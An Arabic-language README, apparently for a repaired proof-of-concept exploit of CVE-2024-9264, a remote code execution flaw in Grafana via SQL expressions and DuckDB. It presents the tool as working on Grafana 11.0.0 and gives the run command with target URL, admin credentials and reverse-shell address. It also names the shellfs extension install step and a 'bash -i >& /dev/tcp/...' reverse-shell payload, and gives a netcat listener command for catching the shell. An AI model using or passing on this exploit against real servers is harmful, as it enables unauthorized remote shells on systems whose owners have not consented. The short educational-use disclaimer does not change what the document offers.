
هذا هو الإصدار المُصلح من استغلال إثبات المفهوم لـ CVE-2024-9264، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد في Grafana (عبر تعبيرات SQL و DuckDB).
🔗 الإعلان الأصلي: إصدار Grafana الأمني
❌ إثبات المفهوم الأصلي: معطل بسبب أخطاء في الصياغة والاستخدام غير الصحيح لـ write_file()
✅ هذا الإصدار يعمل، تم اختباره على مثيل Grafana 11.0.0 به ثغرة.
writefile() بشكل صحيح بدلاً من write_file() (دالة DuckDB)bash -i >& /dev/tcp/...shellfsinstall shellfs from communitypython3 fixed_poc_writefile.py \
--url http://target:3000 \
--username admin \
--password admin \
--reverse-ip <YOUR_IP> \
--reverse-port 4444
ثم استمع باستخدام:
nc -lvnp 4444
هذا المشروع لأغراض تعليمية فقط.
لا تستخدمه ضد أهداف ليس لديك إذن لاختبارها.
تم التعديل والتحقق من قبل Exerr — إثبات المفهوم الأصلي بواسطة z3k0sec.